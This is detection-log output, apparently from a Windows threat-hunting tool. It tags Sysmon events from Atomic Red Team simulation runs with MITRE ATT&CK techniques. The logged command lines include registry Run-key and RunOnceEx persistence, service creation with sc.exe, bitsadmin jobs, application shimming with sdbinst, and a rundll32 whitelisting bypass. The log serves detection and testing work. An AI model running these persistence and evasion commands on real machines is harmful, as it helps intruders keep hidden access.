+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1138] Application Shimming - process,1553028585.172729,2019-03-20T00:49:45.172729+04:00,,Threat,High,"[T1138] Application Shimming - process , please check raw log",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 1966423 + + + + + Microsoft-Windows-Sysmon/Operational + PC01.example.corp + + + + + + 2019-03-19 20:49:45.052 + 365ABB72-55E9-5C91-0000-00102EEB0700 + 2104 + C:\Windows\System32\sdbinst.exe + 6.0.7600.16385 (win7_rtm.090713-1255) + Application Compatibility Database Installer + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\sdbinst.exe" -q -u 
"C:\Windows\AppPatch\Test.SDB " + C:\Windows\System32\ + EXAMPLE\user01 + 365ABB72-5417-5C91-0000-002035340300 + 0x33435 + 1 + High + MD5=2996B3E7BBA42BEA62D386D9386EDE97,IMPHASH=87CBEAE39ADA9E96C7F27B94962CD83F + 365ABB72-551C-5C91-0000-001030590500 + 2704 + C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe + "C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe" + +",PC01.example.corp,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547519.48325,2019-07-19T18:45:19.483250+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3606 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:45:06.251 + 747F3D96-D772-5D31-0000-00107CF02800 + 324 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547506.213488,2019-07-19T18:45:06.213488+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /f" ),1," + + + + + 1 + 5 + 4 
+ 1 + 0 + 0x8000000000000000 + + + 3603 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:45:06.180 + 747F3D96-D772-5D31-0000-001031EB2800 + 6472 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /f" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547506.137175,2019-07-19T18:45:06.137175+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d " C:\Path\AtomicRedTeam.dll ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3600 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:45:06.056 + 747F3D96-D772-5D31-0000-0010BEE52800 + 3216 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d " C:\Path\AtomicRedTeam.dll + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + 
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547506.075725,2019-07-19T18:45:06.075725+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3599 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:44:53.388 + 747F3D96-D765-5D31-0000-001024C32800 + 4264 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547493.349171,2019-07-19T18:44:53.349171+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "REG DELETE " "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V Atomic" Red "Team /f" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3596 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:44:53.314 + 747F3D96-D765-5D31-0000-0010D7BD2800 + 
5824 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "REG DELETE " "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V Atomic" Red "Team /f" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1553037534.182862,2019-03-20T03:18:54.182862+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 1966634 + + + + + Microsoft-Windows-Sysmon/Operational + PC01.example.corp + + + + + + 2019-03-19 23:13:38.586 + 365ABB72-77A2-5C91-0000-00100A570100 + 1636 + C:\Windows\System32\cmd.exe + 6.1.7601.17514 (win7sp1_rtm.101119-1850) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + cmd.exe + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 365ABB72-777F-5C91-0000-0020E7030000 + 0x3e7 + 0 + System + MD5=AD7B9C14083B52BC532FBA5948342B98,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 + 365ABB72-777F-5C91-0000-00100B590000 + 516 + C:\Windows\System32\services.exe + C:\Windows\system32\services.exe + +",PC01.example.corp,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1553037534.172848,2019-03-20T03:18:54.172848+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 1966633 + + + 
+ + Microsoft-Windows-Sysmon/Operational + PC01.example.corp + + + + + + 2019-03-19 23:13:38.576 + 365ABB72-77A2-5C91-0000-00106D560100 + 1628 + C:\Windows\System32\cmd.exe + 6.1.7601.17514 (win7sp1_rtm.101119-1850) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + cmd.exe + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 365ABB72-777F-5C91-0000-0020E7030000 + 0x3e7 + 0 + System + MD5=AD7B9C14083B52BC532FBA5948342B98,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 + 365ABB72-777F-5C91-0000-00100B590000 + 516 + C:\Windows\System32\services.exe + C:\Windows\system32\services.exe + +",PC01.example.corp,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547493.258049,2019-07-19T18:44:53.258049+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "REG ADD " "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V Atomic" Red "Team /t REG_SZ /F /D C:\Path\AtomicRedTeam.exe" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3593 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:44:53.201 + 747F3D96-D765-5D31-0000-001027B72800 + 6584 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "REG ADD " "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V Atomic" Red "Team /t REG_SZ /F /D C:\Path\AtomicRedTeam.exe" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + 
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547466.222431,2019-07-19T18:44:26.222431+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3588 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:44:09.337 + 747F3D96-D739-5D31-0000-0010B2C22600 + 6896 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547449.278042,2019-07-19T18:44:09.278042+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "sc.exe delete AtomicTestService" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3585 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:44:09.225 + 747F3D96-D739-5D31-0000-0010E4BB2600 + 4744 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "sc.exe delete AtomicTestService" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + 
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547449.17604,2019-07-19T18:44:09.176040+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "sc.exe stop AtomicTestService" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3583 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:44:09.142 + 747F3D96-D739-5D31-0000-00104CB72600 + 5000 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "sc.exe stop AtomicTestService" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[ T1543 ] Sc.exe manipulating windows services,1563547448.307214,2019-07-19T18:44:08.307214+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) Trying to manipulate windows services usign Sc.exe with Command Line (sc.exe start AtomicTestService) and Parent Image :C:\Windows\System32\cmd.exe , Parent CommandLine ("C:\Windows\system32\cmd.exe" /c "sc.exe start AtomicTestService") in directory : ( C:\AtomicRedTeam\ )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 
0x8000000000000000 + + + 3581 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + Persistence or Exec - Services Management + 2019-07-19 14:44:08.269 + 747F3D96-D738-5D31-0000-0010D8AA2600 + 4260 + C:\Windows\System32\sc.exe + 10.0.17763.1 (WinBuild.160101.0800) + Service Control Manager Configuration Tool + Microsoft® Windows® Operating System + Microsoft Corporation + sc.exe start AtomicTestService + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=622FA2729408E5F467A592223219DA7C547E7CC7,MD5=ABB56882148DE65D53ABFC55544A49A8,SHA256=78097C7CD0E57902536C60B7FA17528C313DB20869E5F944223A0BA4C801D39B,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF + 747F3D96-D738-5D31-0000-001056A62600 + 2556 + C:\Windows\System32\cmd.exe + "C:\Windows\system32\cmd.exe" /c "sc.exe start AtomicTestService" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547448.288861,2019-07-19T18:44:08.288861+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "sc.exe start AtomicTestService" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3580 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:44:08.227 + 747F3D96-D738-5D31-0000-001056A62600 + 2556 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "sc.exe start AtomicTestService" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + 
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[ T1543 ] Sc.exe manipulating windows services,1563547448.221461,2019-07-19T18:44:08.221461+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) Trying to manipulate windows services usign Sc.exe with Command Line (sc.exe create AtomicTestService binPath= C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe) and Parent Image :C:\Windows\System32\cmd.exe , Parent CommandLine ("C:\Windows\system32\cmd.exe" /c "sc.exe create AtomicTestService binPath= C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe") in directory : ( C:\AtomicRedTeam\ )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3577 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + Persistence or Exec - Services Management + 2019-07-19 14:44:08.181 + 747F3D96-D738-5D31-0000-001098A22600 + 1700 + C:\Windows\System32\sc.exe + 10.0.17763.1 (WinBuild.160101.0800) + Service Control Manager Configuration Tool + Microsoft® Windows® Operating System + Microsoft Corporation + sc.exe create AtomicTestService binPath= C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=622FA2729408E5F467A592223219DA7C547E7CC7,MD5=ABB56882148DE65D53ABFC55544A49A8,SHA256=78097C7CD0E57902536C60B7FA17528C313DB20869E5F944223A0BA4C801D39B,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF + 747F3D96-D738-5D31-0000-001046A02600 + 4216 + C:\Windows\System32\cmd.exe + "C:\Windows\system32\cmd.exe" /c "sc.exe create AtomicTestService binPath= C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547448.185344,2019-07-19T18:44:08.185344+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "sc.exe create 
AtomicTestService binPath= C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3576 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:44:08.146 + 747F3D96-D738-5D31-0000-001046A02600 + 4216 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "sc.exe create AtomicTestService binPath= C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1553031677.339046,2019-03-20T01:41:17.339046+04:00,,Threat,Low,Found User (EXAMPLE\user01) running image ( C:\Windows\System32\cmd.exe ) through command line ( C:\Windows\system32\cmd.EXE /c malwr.vbs ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 1966563 + + + + + Microsoft-Windows-Sysmon/Operational + PC01.example.corp + + + + + + 2019-03-19 21:41:17.288 + 365ABB72-61FD-5C91-0000-0010536A1200 + 2340 + C:\Windows\System32\cmd.exe + 6.1.7601.17514 (win7sp1_rtm.101119-1850) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + C:\Windows\system32\cmd.EXE /c malwr.vbs + C:\Windows\system32\ + EXAMPLE\user01 + 365ABB72-5417-5C91-0000-002035340300 + 0x33435 + 1 + High + MD5=AD7B9C14083B52BC532FBA5948342B98,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 + 365ABB72-528D-5C91-0000-001062560000 + 484 + C:\Windows\System32\services.exe + 
C:\Windows\system32\services.exe + +",PC01.example.corp,Microsoft-Windows-Sysmon/Operational +[ T1086 ] Powershell with Suspicious Argument,1563547426.623217,2019-07-19T18:43:46.623217+04:00,,Threat,Critical,"Found User (MSEDGEWIN10\IEUser) run Suspicious PowerShell commands that include (powershell) in event with Command Line (powershell) and Parent Image :C:\Windows\System32\cmd.exe , Parent CommandLine ("C:\Windows\system32\cmd.exe") in directory : ( c:\AtomicRedTeam\ )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3574 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:43:03.271 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows PowerShell + Microsoft® Windows® Operating System + Microsoft Corporation + powershell + c:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=6CBCE4A295C163791B60FC23D285E6D84F28EE4C,MD5=7353F60B1739074EB17C5F4DDDEFE239,SHA256=DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F + 747F3D96-D6ED-5D31-0000-0010C88A2500 + 3764 + C:\Windows\System32\cmd.exe + "C:\Windows\system32\cmd.exe" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1086] PowerShell Process found,1563547426.623217,2019-07-19T18:43:46.623217+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) through command line ( powershell ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3574 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:43:03.271 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows PowerShell + Microsoft® Windows® Operating System + Microsoft Corporation + powershell + 
c:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=6CBCE4A295C163791B60FC23D285E6D84F28EE4C,MD5=7353F60B1739074EB17C5F4DDDEFE239,SHA256=DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F + 747F3D96-D6ED-5D31-0000-0010C88A2500 + 3764 + C:\Windows\System32\cmd.exe + "C:\Windows\system32\cmd.exe" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547383.303217,2019-07-19T18:43:03.303217+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3573 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:42:53.277 + 747F3D96-D6ED-5D31-0000-0010C88A2500 + 3764 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D4B8-5D31-0000-0010A8CE0600 + 4416 + C:\Windows\explorer.exe + C:\Windows\Explorer.EXE + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547710.660877,2019-07-19T18:48:30.660877+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "bitsadmin.exe /create AtomicBITS" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3657 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:48:30.619 + 
747F3D96-D83E-5D31-0000-0010F0D02E00 + 752 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "bitsadmin.exe /create AtomicBITS" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1117] Bypassing Application Whitelisting,1553030551.500169,2019-03-20T01:22:31.500169+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( "C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Windows\AppPatch\Custom\{3ad6ed23-adf8-4bc1-a898-4d695f482c64}.sdb)",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 1966541 + + + + + Microsoft-Windows-Sysmon/Operational + PC01.example.corp + + + + + + 2019-03-19 21:22:28.806 + 365ABB72-5D94-5C91-0000-001080E90F00 + 3840 + 